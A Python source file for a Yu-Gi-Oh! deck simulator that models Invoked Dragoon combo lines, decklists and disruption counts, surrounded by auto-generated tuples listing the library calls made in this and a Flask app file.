(11364, 11373), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((12523, 12588), 'flask.flash', 'flash', (['f"""You cannot kick {user.username} from {ag.display_name}."""'], {}), "(f'You cannot kick {user.username} from {ag.display_name}.')\n", (12528, 12588), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13021, 13042), 'app.models.db.session.delete', 'db.session.delete', (['ag'], {}), '(ag)\n', (13038, 13042), False, 'from app.models import db\n'), ((13051, 13070), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (13068, 13070), False, 'from app.models import db\n'), ((13079, 13157), 'flask.flash', 'flash', (['f"""You sucessfully left and deleted the AG {ag.display_name}"""', '"""success"""'], {}), "(f'You sucessfully left and deleted the AG {ag.display_name}', 'success')\n", (13084, 13157), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13646, 13689), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (13653, 13689), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((14608, 14624), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (14615, 14624), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2391, 2418), 'flask.jsonify', 'jsonify', (["{'reason': 'name'}"], {}), "({'reason': 'name'})\n", (2398, 2418), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2593, 2628), 'flask.jsonify', 'jsonify', (["{'reason': 'display_name'}"], {}), "({'reason': 'display_name'})\n", (2600, 2628), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2650, 2692), 're.match', 're.match', (['AGRegex.description', 'description'], {}), '(AGRegex.description, description)\n', (2658, 2692), False, 'import re\n'), ((2710, 2744), 'flask.jsonify', 'jsonify', (["{'reason': 'description'}"], {}), "({'reason': 'description'})\n", (2717, 2744), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((5884, 5928), 're.match', 're.match', (['AGRegex.display_name', 'display_name'], {}), '(AGRegex.display_name, display_name)\n', (5892, 5928), False, 'import re\n'), ((6039, 6081), 're.match', 're.match', (['AGRegex.description', 'description'], {}), '(AGRegex.description, description)\n', (6047, 6081), False, 'import re\n'), ((6339, 6369), 'flask.jsonify', 'jsonify', (["{'status': 'success'}"], {}), "({'status': 'success'})\n", (6346, 6369), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((8856, 8874), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (8872, 8874), False, 'from app.models import db\n'), ((9042, 9084), 'flask.url_for', 'url_for', (['"""ag.ag_settings"""'], {'ag_name': 'ag_name'}), "('ag.ag_settings', ag_name=ag_name)\n", (9049, 9084), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10244, 10287), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (10251, 10287), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10942, 11028), 'flask.flash', 'flash', (['f"""You cannot leave an AG, when there is no Mentor left afterwards"""', '"""error"""'], {}), "(f'You cannot leave an AG, when there is no Mentor left afterwards',\n 'error')\n", (10947, 11028), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((11156, 11214), 'flask.flash', 'flash', (['f"""You sucessfully left the AG {ag.name}"""', '"""success"""'], {}), "(f'You sucessfully left the AG {ag.name}', 'success')\n", (11161, 11214), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((12613, 12656), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (12620, 12656), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13182, 13198), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (13189, 13198), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13304, 13375), 'flask.flash', 'flash', (['f"""You cannot kick the last Mentor of {ag.display_name}"""', '"""error"""'], {}), "(f'You cannot kick the last Mentor of {ag.display_name}', 'error')\n", (13309, 13375), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13475, 13568), 'flask.flash', 'flash', (['f"""You sucessfully kicked {user.username} from the AG {ag.display_name}"""', '"""success"""'], {}), "(f'You sucessfully kicked {user.username} from the AG {ag.display_name}',\n 'success')\n", (13480, 13568), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13573, 13592), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (13590, 13592), False, 'from app.models import db\n'), ((2345, 2373), 're.match', 're.match', (['AGRegex.name', 'name'], {}), '(AGRegex.name, name)\n', (2353, 2373), False, 'import re\n'), ((2531, 2575), 're.match', 're.match', (['AGRegex.display_name', 'display_name'], {}), '(AGRegex.display_name, display_name)\n', (2539, 2575), False, 'import re\n'), ((3484, 3524), 'flask.url_for', 'url_for', (['"""ag.invite_ag"""'], {'ag_name': 'ag.name'}), "('ag.invite_ag', ag_name=ag.name)\n", (3491, 3524), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((11049, 11092), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (11056, 11092), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((7220, 7243), 'app.models.ag.AG.query.offset', 'AG.query.offset', (['offset'], {}), '(offset)\n', (7235, 7243), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((8564, 8618), 'sqlalchemy.sql.and_', 'and_', (['(UserAG.user_id == user_id)', '(UserAG.ag_id == ag.id)'], {}), '(UserAG.user_id == user_id, UserAG.ag_id == ag.id)\n', (8568, 8618), False, 'from sqlalchemy.sql import exists, and_\n'), ((12283, 12307), 'app.models.db.session.query', 'db.session.query', (['UserAG'], {}), '(UserAG)\n', (12299, 12307), False, 'from app.models import db\n'), ((4040, 4048), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (4046, 4048), False, 'from sqlalchemy.sql import exists, and_\n'), ((4775, 4783), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (4781, 4783), False, 'from sqlalchemy.sql import exists, and_\n'), ((8532, 8556), 'app.models.db.session.query', 'db.session.query', (['UserAG'], {}), '(UserAG)\n', (8548, 8556), False, 'from app.models import db\n'), ((2278, 2286), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (2284, 2286), False, 'from sqlalchemy.sql import exists, and_\n'), ((2448, 2456), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (2454, 2456), False, 'from sqlalchemy.sql import exists, and_\n')]
|
from typing import List, Optional, Tuple
from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game
class InvokedDragoonManager(Manager):
# Invoked
aleister = Card("Aleister the Invoker", CardType.MONSTER)
invocation = Card("Invocation", CardType.SPELL)
meltdown = Card("Magical Meltdown", CardType.SPELL)
terraforming = Card("Terraforming", CardType.SPELL)
# Extenders
jester = Card("Jester Confit", CardType.MONSTER)
souls = Card("Magicians' Souls", CardType.MONSTER)
# Trickstar Engine
candina = Card("Trickstar Candina", CardType.MONSTER)
corobane = Card("Trickstar Corobane", CardType.MONSTER)
lightstage = Card("Trickstar Lightstage", CardType.SPELL)
set_rotation = Card("Set Rotation", CardType.SPELL)
# Draw
desires = Card("Pot of Desires", CardType.SPELL)
upstart = Card("Upstart Goblin", CardType.SPELL)
# Hand Traps
nibiru = Card("Nibiru, the Primal Being", CardType.MONSTER)
ash = Card("Ash Blossom & Joyous Spring", CardType.MONSTER)
ogre = Card("Ghost Ogre & Snow Rabbit", CardType.MONSTER)
droll = Card("Droll & Lock Bird", CardType.MONSTER)
veiler = Card("Effect Veiler", CardType.MONSTER)
gamma = Card("PSY-Framegear Gamma", CardType.MONSTER)
driver = Card("PSY-Frame Driver", CardType.MONSTER)
crow = Card("D.D. Crow", CardType.MONSTER)
belle = Card("Ghost Belle & Haunted Mansion", CardType.MONSTER)
meister = Card("Skull Meister", CardType.MONSTER)
imperm = Card("Infinite Impermanence", CardType.TRAP)
# Dragoons
dm = Card("Dark Magician", CardType.MONSTER)
red_eyes = Card("Red-Eyes Black Dragon", CardType.MONSTER)
ref = Card("Red-Eyes Fusion", CardType.SPELL)
magicalized_fusion = Card("Magicalized Fusion", CardType.SPELL)
# Misc
fleur = Card("<NAME>, the Knighted", CardType.MONSTER)
droplet = Card("Forbidden Droplet", CardType.SPELL)
called = Card("Called by the Grave", CardType.SPELL)
cyclone = Card("Cosmic Cyclone", CardType.SPELL)
duster = Card("Harpie's Feather Duster", CardType.SPELL)
mind_control = Card("Mind Control", CardType.SPELL)
prison = Card("Ice Dragon's Prison", CardType.TRAP)
judgment = Card("Solemn Judgment", CardType.TRAP)
# Extra Deck
carrier = Card("Union Carrier", CardType.EXTRA_DECK)
almiraj = Card("Salamangreat Almiraj", CardType.EXTRA_DECK)
gardna = Card("Secure Gardna", CardType.EXTRA_DECK)
artemis = Card("Artemis, the Magistus Moon Maiden", CardType.EXTRA_DECK)
mechaba = Card("Invoked Mechaba", CardType.EXTRA_DECK)
augoeides = Card("Invoked Augoeides", CardType.EXTRA_DECK)
purgatrio = Card("Invoked Purgatrio", CardType.EXTRA_DECK)
omega = Card("Psy-framelord Omega", CardType.EXTRA_DECK)
verte = Card("Predaplant Verte Anaconda", CardType.EXTRA_DECK)
dragoon = Card("Red-Eyes Dark Dragoon", CardType.EXTRA_DECK)
# Disruptions
disr_dragoon = Disruption(repr(dragoon), 8)
disr_mechaba_m = Disruption(f"{repr(mechaba)} (M)", 2)
disr_mechaba_s = Disruption(f"{repr(mechaba)} (S)", 0)
disr_mechaba_t = Disruption(f"{repr(mechaba)} (T)", 0)
disr_prison = Disruption(repr(prison), 2)
disr_judgment = Disruption(repr(judgment), 2)
disr_aleister = Disruption(repr(aleister), 1)
# Lists
hand_traps = (ash, ogre, veiler, imperm, nibiru, droll, crow, belle, meister, gamma)
protection = (belle, called)
cards_to_set = (judgment, droplet, called, imperm, prison, cyclone)
discards = (driver, duster, mind_control, upstart, cyclone)
light_monsters = (corobane, candina, artemis, gardna, fleur)
not_opt = (imperm, crow, meister, veiler, cyclone)
going_second = (duster, mind_control)
verte_materials = (
aleister,
candina,
corobane,
souls,
jester,
fleur,
) # artemis, almiraj, gardna?
standard_decklist = DeckList(
(
(aleister, 3),
(invocation, 2),
(meltdown, 3),
(terraforming, 1),
(prison, 2),
(imperm, 3),
(ash, 3),
(souls, 3),
(dm, 2),
# (fleur, 1),
(red_eyes, 2),
(ref, 3),
(magicalized_fusion, 1),
(candina, 1),
(corobane, 1),
(lightstage, 1),
# (upstart, 1),
(cyclone, 2),
(judgment, 2),
(upstart, 1),
(duster, 1),
(mind_control, 1),
(set_rotation, 1),
(called, 1),
),
(
(almiraj, 1),
(artemis, 1),
(gardna, 1),
(mechaba, 2),
(purgatrio, 1),
(augoeides, 1),
(omega, 1),
(dragoon, 2),
(verte, 2),
),
)
default_decklist = standard_decklist
#########
# Helpers
#########
@classmethod
def generate_stats(cls, end_games: List[Game]) -> List[List[str]]:
return [
["Dragoon", cls.percent_with_flags(end_games, ["dragoon"])],
["Mechaba", cls.percent_with_flags(end_games, ["mechaba"])],
["Both", cls.percent_with_flags(end_games, ["dragoon", "mechaba"])],
["3+ Disruptions", cls.percent_with_flags(end_games, ["3+ disruptions"])],
["Bricks", cls.percent_with_flags(end_games, ["brick"])],
]
def postprocess(self, game: Game):
return game
def endphase(self, game: Game):
for card in game.hand.cards[:]: # make a copy so we can modify hand
if card in self.cards_to_set:
game.move(game.hand, game.backrow, card)
# Process Disruptions
pure_distruptions = 0
if self.dragoon in game.monsters and len(game.hand):
game.add_flag("dragoon")
game.disruptions.add(self.disr_dragoon)
pure_distruptions += 1
if self.mechaba in game.monsters:
for card in game.hand:
game.add_flag("mechaba")
if card.card_type == CardType.MONSTER:
game.disruptions.add(self.disr_mechaba_m)
elif card.card_type == CardType.SPELL:
game.disruptions.add(self.disr_mechaba_s)
elif card.card_type == CardType.TRAP:
game.disruptions.add(self.disr_mechaba_t)
if game.has_flag("mechaba"):
pure_distruptions += 1
for card in game.hand:
if card in self.hand_traps:
if card == self.gamma and self.driver in game.banished:
continue
if card == self.imperm:
continue
pure_distruptions += 1
game.disruptions.add(Disruption(repr(card), 1))
for card in game.backrow:
if card in self.cards_to_set:
pure_distruptions += 1
if card == self.prison:
game.disruptions.add(self.disr_prison)
elif card == self.judgment:
game.disruptions.add(self.disr_judgment)
else:
game.disruptions.add(Disruption(repr(card), 1))
if pure_distruptions >= 3:
game.add_flag("3+ disruptions")
if pure_distruptions < 3 and not game.has_flag("dragoon"):
game.add_flag("brick")
return game
def get_redundant_cards_in_hand(
self, game: Game, include_useful: bool = False
) -> List[Card]:
redundant_cards = {} # higher value means more redundant
hand = game.hand.cards[:]
for card in hand:
if count := hand.count(card) == 1:
if game.hopt_available(card):
redundant_cards[card] = 0
else:
redundant_cards[card] = 2
elif count == 2:
if card in self.not_opt:
redundant_cards[card] = 1
else:
redundant_cards[card] = 2
else:
redundant_cards[card] = 3
to_return = sorted(
redundant_cards.keys(), key=lambda x: redundant_cards[x], reverse=True
)
if include_useful:
return to_return
else:
return [card for card in to_return if redundant_cards[card] > 1]
def find_dragoons_materials(
self, game: Game
) -> Tuple[Optional[CardGroup], Optional[CardGroup]]:
dm_location, red_eyes_location = None, None
if self.dm in game.deck:
dm_location = game.deck
elif self.dm in game.hand:
dm_location = game.hand
if self.red_eyes in game.deck:
red_eyes_location = game.deck
elif self.red_eyes in game.hand:
red_eyes_location = game.hand
return dm_location, red_eyes_location
#########
# Selects
#########
def select_invocation_banish_from_grave(self, game: Game) -> Optional[Card]:
return game.grave.get_any(self.light_monsters)
def select_invocation_banish_from_field(self, game: Game) -> Optional[Card]:
return game.monsters.get_any(self.light_monsters)
def select_souls_dump(self, game: Game) -> Optional[Card]:
if self.dm in game.deck:
return self.dm
else:
return None
def select_souls_fodder(self, game: Game, count: int) -> List[Card]:
fodder = []
cards = self.get_redundant_cards_in_hand(game, include_useful=False)
while cards and len(fodder) < count:
card = cards.pop()
if card.card_type in [CardType.SPELL, CardType.TRAP]:
fodder.append(card)
return fodder
def select_terraforming_target(self, game: Game) -> Optional[Card]:
if (
self.meltdown in game.deck
and game.hopt_available(self.meltdown)
and self.meltdown not in game.hand
and self.aleister not in game.hand
):
return self.meltdown
elif (
self.lightstage in game.deck
and self.lightstage not in game.hand
and not (self.corobane in game.hand and self.candina in game.hand)
):
return self.lightstage
elif self.meltdown in game.deck:
return self.meltdown
elif self.lightstage in game.deck:
return self.lightstage
else:
return None
def select_set_rotation_targets(self, game: Game) -> List[Card]:
my_card, opp_card = None, None
if self.meltdown in game.hand or self.aleister in game.hand:
# we have a path to aleister. give them meltdown and take stage for corobane
if self.lightstage in game.deck:
my_card = self.lightstage
if self.meltdown in game.deck:
opp_card = self.meltdown
else:
if self.meltdown in game.deck:
my_card = self.meltdown
if self.lightstage in game.deck:
opp_card = self.lightstage
return my_card, opp_card
#########
# Actions
#########
def action_use_upstart(self, game: Game) -> Optional[Game]:
if self.upstart in game.hand and len(game.deck) > 1:
game.move(game.hand, game.grave, self.upstart)
game.draw()
return game
def action_use_terraforming(self, game: Game) -> Optional[Game]:
if self.terraforming in game.hand and game.hopt_available(self.terraforming):
target = self.select_terraforming_target(game)
if not target:
return None
game.move(game.hand, game.grave, self.terraforming)
game.move(game.deck, game.hand, target)
game.use_hopt(self.terraforming)
return game
def action_use_set_rotation(self, game: Game) -> Optional[Game]:
if self.set_rotation in game.hand:
my_card, opp_card = self.select_set_rotation_targets(game)
if not (my_card and opp_card):
return None
else:
game.use_resource("activate field spell")
game.move(game.hand, game.grave, self.set_rotation)
game.move(game.deck, game.backrow, my_card)
game.deck.cards.remove(opp_card)
return game
def action_use_meltdown(self, game: Game) -> Optional[Game]:
if (
self.meltdown in game.hand
and game.hopt_available(self.meltdown)
and game.resource_available("activate field spell")
):
game.move(game.hand, game.backrow, self.meltdown)
game.use_hopt(self.meltdown)
if self.aleister in game.deck:
game.move(game.deck, game.hand, self.aleister)
return game
def action_summon_aleister(self, game: Game) -> Optional[Game]:
if (
self.aleister in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.move(game.hand, game.monsters, self.aleister)
game.use_resource("normal summon")
if self.invocation in game.deck:
game.move(game.deck, game.hand, self.invocation)
game.use_hopt(self.aleister)
return game
def action_summon_artemis(self, game: Game) -> Optional[Game]:
if self.artemis in game.extra_deck and game.resource_available("summon"):
if self.aleister in game.monsters:
game.move(game.monsters, game.grave, self.aleister)
elif self.jester in game.monsters:
game.move(game.monsters, game.grave, self.jester)
elif self.souls in game.monsters:
game.move(game.monsters, game.grave, self.souls)
else:
return None
game.move(game.extra_deck, game.monsters, self.artemis)
return game
def action_summon_almiraj(self, game: Game) -> Optional[Game]:
if (
self.almiraj in game.extra_deck
and self.aleister in game.monsters
and game.resource_available("summon")
):
game.move(game.monsters, game.grave, self.aleister)
game.move(game.extra_deck, game.monsters, self.almiraj)
return game
def action_summon_gardna(self, game: Game) -> Optional[Game]:
if (
self.gardna in game.extra_deck
and self.almiraj in game.monsters
and game.resource_available("summon")
):
game.move(game.monsters, game.grave, self.almiraj)
game.move(game.extra_deck, game.monsters, self.gardna)
return game
def action_summon_souls(self, game: Game) -> Optional[Game]:
if (
self.souls in game.hand
and game.hopt_available(self.souls, "summon")
and game.resource_available("summon")
):
dump_target = self.select_souls_dump(game)
if not dump_target:
return None
game.move(game.deck, game.grave, dump_target)
game.move(game.hand, game.monsters, self.souls)
game.use_hopt(self.souls, "summon")
return game
def action_normal_summon_souls(self, game: Game) -> Optional[Game]:
if (
self.souls in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.use_resource("normal summon")
game.move(game.hand, game.monsters, self.souls)
return game
def action_use_souls(self, game: Game) -> Optional[Game]:
if self.souls in game.monsters and game.hopt_available(self.souls, "draw"):
game.use_hopt(self.souls, "draw")
if self.meltdown in game.backrow:
game.move(game.backrow, game.grave, self.meltdown)
game.draw()
fodder = self.select_souls_fodder(game, 1)
if fodder:
game.move(game.hand, game.grave, fodder[0])
game.draw()
else:
fodder = self.select_souls_fodder(game, 2)
if not fodder:
return None
while fodder:
game.move(game.hand, game.grave, fodder.pop())
game.draw()
return game
def action_summon_jester(self, game: Game) -> Optional[Game]:
if (
self.jester in game.hand
and game.hopt_available(self.jester)
and game.resource_available("summon")
):
game.move(game.hand, game.monsters, self.jester)
game.use_hopt(self.jester)
return game
def action_normal_summon_jester(self, game: Game) -> Optional[Game]:
if (
self.jester in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.use_resource("normal summon")
game.move(game.hand, game.monsters, self.jester)
return game
def action_summon_corobane(self, game: Game) -> Optional[Game]:
if (
self.corobane in game.hand
and game.hopt_available(self.corobane)
and not game.monsters.cards
and game.resource_available("summon")
):
game.move(game.hand, game.monsters, self.corobane)
game.use_hopt(self.corobane)
return game
def action_normal_summon_candina(self, game: Game) -> Optional[Game]:
if (
self.candina in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.use_resource("normal summon")
game.move(game.hand, game.monsters, self.candina)
if self.lightstage in game.deck:
game.move(game.deck, game.hand, self.lightstage)
elif self.corobane in game.deck:
game.move(game.deck, game.hand, self.corobane)
return game
def action_use_lightstage(self, game: Game) -> Optional[Game]:
if (
self.lightstage in game.hand
and any(card in game.deck for card in [self.corobane, self.candina])
and game.resource_available("activate field spell")
):
if self.meltdown in game.hand or self.aleister in game.hand:
game.move(game.hand, game.backrow, self.lightstage)
# search corobane, alesiter will be normaled
if self.corobane in game.deck:
game.move(game.deck, game.hand, self.corobane)
elif self.candina in game.deck:
game.move(game.deck, game.hand, self.candina)
return game
else:
game.move(game.hand, game.backrow, self.lightstage)
# search candina to normal
if self.candina in game.deck:
game.move(game.deck, game.hand, self.candina)
elif self.corobane in game.deck:
game.move(game.deck, game.hand, self.corobane)
return game
def action_summon_mechaba(self, game: Game) -> Optional[Game]:
if (
self.invocation in game.hand
and self.mechaba in game.extra_deck
and game.resource_available("summon")
):
if self.aleister in game.grave:
game.move(game.grave, game.banished, self.aleister)
elif self.aleister in game.monsters:
game.move(game.monsters, game.banished, self.aleister)
else:
return None
if grave_target := self.select_invocation_banish_from_grave(game):
game.move(game.grave, game.banished, grave_target)
elif field_target := self.select_invocation_banish_from_field(game):
game.move(game.monsters, game.banished, field_target)
else:
return None
game.move(game.hand, game.grave, self.invocation)
game.move(game.extra_deck, game.monsters, self.mechaba)
if game.hopt_available(self.invocation, "recycle"):
game.use_hopt(self.invocation, "recycle")
game.move(game.grave, game.deck, self.invocation)
game.move(game.banished, game.hand, self.aleister)
game.deck.shuffle()
return game
def action_summon_verte(self, game: Game) -> Optional[Game]:
if self.verte in game.extra_deck and game.resource_available("summon"):
materials = []
monsters = game.monsters.cards[:]
while len(materials) < 2 and monsters:
card = monsters.pop()
if card in self.verte_materials:
materials.append(card)
if len(materials) < 2:
return None
for material in materials:
game.move(game.monsters, game.grave, material)
game.move(game.extra_deck, game.monsters, self.verte)
return game
def action_use_verte(self, game: Game) -> Optional[Game]:
if (
self.verte in game.monsters
and game.hopt_available(self.verte)
and self.ref in game.deck
and self.dragoon in game.extra_deck
):
dm_location, red_eyes_location = self.find_dragoons_materials(game)
if not (dm_location and red_eyes_location):
return None
game.use_hopt(self.verte)
game.move(game.deck, game.grave, self.ref)
game.move(dm_location, game.grave, self.dm)
game.move(red_eyes_location, game.grave, self.red_eyes)
game.move(game.extra_deck, game.monsters, self.dragoon)
game.use_resource("summon")
return game
def action_use_ref(self, game: Game) -> Optional[Game]:
if (
self.ref in game.hand
and self.dragoon in game.extra_deck
and not game.monsters.cards
):
dm_location, red_eyes_location = self.find_dragoons_materials(game)
if not (dm_location and red_eyes_location):
return None
game.move(game.hand, game.grave, self.ref)
game.move(dm_location, game.grave, self.dm)
game.move(red_eyes_location, game.grave, self.red_eyes)
game.move(game.extra_deck, game.monsters, self.dragoon)
game.use_resource("summon")
return game
def action_summon_fleur(self, game: Game) -> Optional[Game]:
if (
self.fleur in game.hand
and game.resource_available("summon")
and any(card.card_type == CardType.EXTRA_DECK for card in game.monsters)
):
game.move(game.hand, game.monsters, self.fleur)
return game
|
[
"framework.DeckList",
"framework.Card"
] |
[((195, 241), 'framework.Card', 'Card', (['"""Aleister the Invoker"""', 'CardType.MONSTER'], {}), "('Aleister the Invoker', CardType.MONSTER)\n", (199, 241), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((259, 293), 'framework.Card', 'Card', (['"""Invocation"""', 'CardType.SPELL'], {}), "('Invocation', CardType.SPELL)\n", (263, 293), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((309, 349), 'framework.Card', 'Card', (['"""Magical Meltdown"""', 'CardType.SPELL'], {}), "('Magical Meltdown', CardType.SPELL)\n", (313, 349), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((369, 405), 'framework.Card', 'Card', (['"""Terraforming"""', 'CardType.SPELL'], {}), "('Terraforming', CardType.SPELL)\n", (373, 405), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((436, 475), 'framework.Card', 'Card', (['"""Jester Confit"""', 'CardType.MONSTER'], {}), "('Jester Confit', CardType.MONSTER)\n", (440, 475), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((488, 530), 'framework.Card', 'Card', (['"""Magicians\' Souls"""', 'CardType.MONSTER'], {}), '("Magicians\' Souls", CardType.MONSTER)\n', (492, 530), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((569, 612), 'framework.Card', 'Card', (['"""Trickstar Candina"""', 'CardType.MONSTER'], {}), "('Trickstar Candina', CardType.MONSTER)\n", (573, 612), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((628, 672), 'framework.Card', 'Card', (['"""Trickstar Corobane"""', 'CardType.MONSTER'], {}), "('Trickstar Corobane', CardType.MONSTER)\n", (632, 672), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((690, 734), 'framework.Card', 'Card', (['"""Trickstar Lightstage"""', 'CardType.SPELL'], {}), "('Trickstar Lightstage', CardType.SPELL)\n", (694, 734), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((754, 790), 'framework.Card', 'Card', (['"""Set Rotation"""', 'CardType.SPELL'], {}), "('Set Rotation', CardType.SPELL)\n", (758, 790), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((817, 855), 'framework.Card', 'Card', (['"""Pot of Desires"""', 'CardType.SPELL'], {}), "('Pot of Desires', CardType.SPELL)\n", (821, 855), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((870, 908), 'framework.Card', 'Card', (['"""Upstart Goblin"""', 'CardType.SPELL'], {}), "('Upstart Goblin', CardType.SPELL)\n", (874, 908), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((940, 990), 'framework.Card', 'Card', (['"""Nibiru, the Primal Being"""', 'CardType.MONSTER'], {}), "('Nibiru, the Primal Being', CardType.MONSTER)\n", (944, 990), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1001, 1054), 'framework.Card', 'Card', (['"""Ash Blossom & Joyous Spring"""', 'CardType.MONSTER'], {}), "('Ash Blossom & Joyous Spring', CardType.MONSTER)\n", (1005, 1054), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1066, 1116), 'framework.Card', 'Card', (['"""Ghost Ogre & Snow Rabbit"""', 'CardType.MONSTER'], {}), "('Ghost Ogre & Snow Rabbit', CardType.MONSTER)\n", (1070, 1116), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1129, 1172), 'framework.Card', 'Card', (['"""Droll & Lock Bird"""', 'CardType.MONSTER'], {}), "('Droll & Lock Bird', CardType.MONSTER)\n", (1133, 1172), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1186, 1225), 'framework.Card', 'Card', (['"""Effect Veiler"""', 'CardType.MONSTER'], {}), "('Effect Veiler', CardType.MONSTER)\n", (1190, 1225), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1238, 1283), 'framework.Card', 'Card', (['"""PSY-Framegear Gamma"""', 'CardType.MONSTER'], {}), "('PSY-Framegear Gamma', CardType.MONSTER)\n", (1242, 1283), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1297, 1339), 'framework.Card', 'Card', (['"""PSY-Frame Driver"""', 'CardType.MONSTER'], {}), "('PSY-Frame Driver', CardType.MONSTER)\n", (1301, 1339), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1351, 1386), 'framework.Card', 'Card', (['"""D.D. Crow"""', 'CardType.MONSTER'], {}), "('D.D. Crow', CardType.MONSTER)\n", (1355, 1386), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1399, 1454), 'framework.Card', 'Card', (['"""Ghost Belle & Haunted Mansion"""', 'CardType.MONSTER'], {}), "('Ghost Belle & Haunted Mansion', CardType.MONSTER)\n", (1403, 1454), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1469, 1508), 'framework.Card', 'Card', (['"""Skull Meister"""', 'CardType.MONSTER'], {}), "('Skull Meister', CardType.MONSTER)\n", (1473, 1508), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1522, 1566), 'framework.Card', 'Card', (['"""Infinite Impermanence"""', 'CardType.TRAP'], {}), "('Infinite Impermanence', CardType.TRAP)\n", (1526, 1566), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1592, 1631), 'framework.Card', 'Card', (['"""Dark Magician"""', 'CardType.MONSTER'], {}), "('Dark Magician', CardType.MONSTER)\n", (1596, 1631), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1647, 1694), 'framework.Card', 'Card', (['"""Red-Eyes Black Dragon"""', 'CardType.MONSTER'], {}), "('Red-Eyes Black Dragon', CardType.MONSTER)\n", (1651, 1694), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1705, 1744), 'framework.Card', 'Card', (['"""Red-Eyes Fusion"""', 'CardType.SPELL'], {}), "('Red-Eyes Fusion', CardType.SPELL)\n", (1709, 1744), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1770, 1812), 'framework.Card', 'Card', (['"""Magicalized Fusion"""', 'CardType.SPELL'], {}), "('Magicalized Fusion', CardType.SPELL)\n", (1774, 1812), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1837, 1883), 'framework.Card', 'Card', (['"""<NAME>, the Knighted"""', 'CardType.MONSTER'], {}), "('<NAME>, the Knighted', CardType.MONSTER)\n", (1841, 1883), False, 'from framework import CardGroup, CardType, DeckList, Disruption, 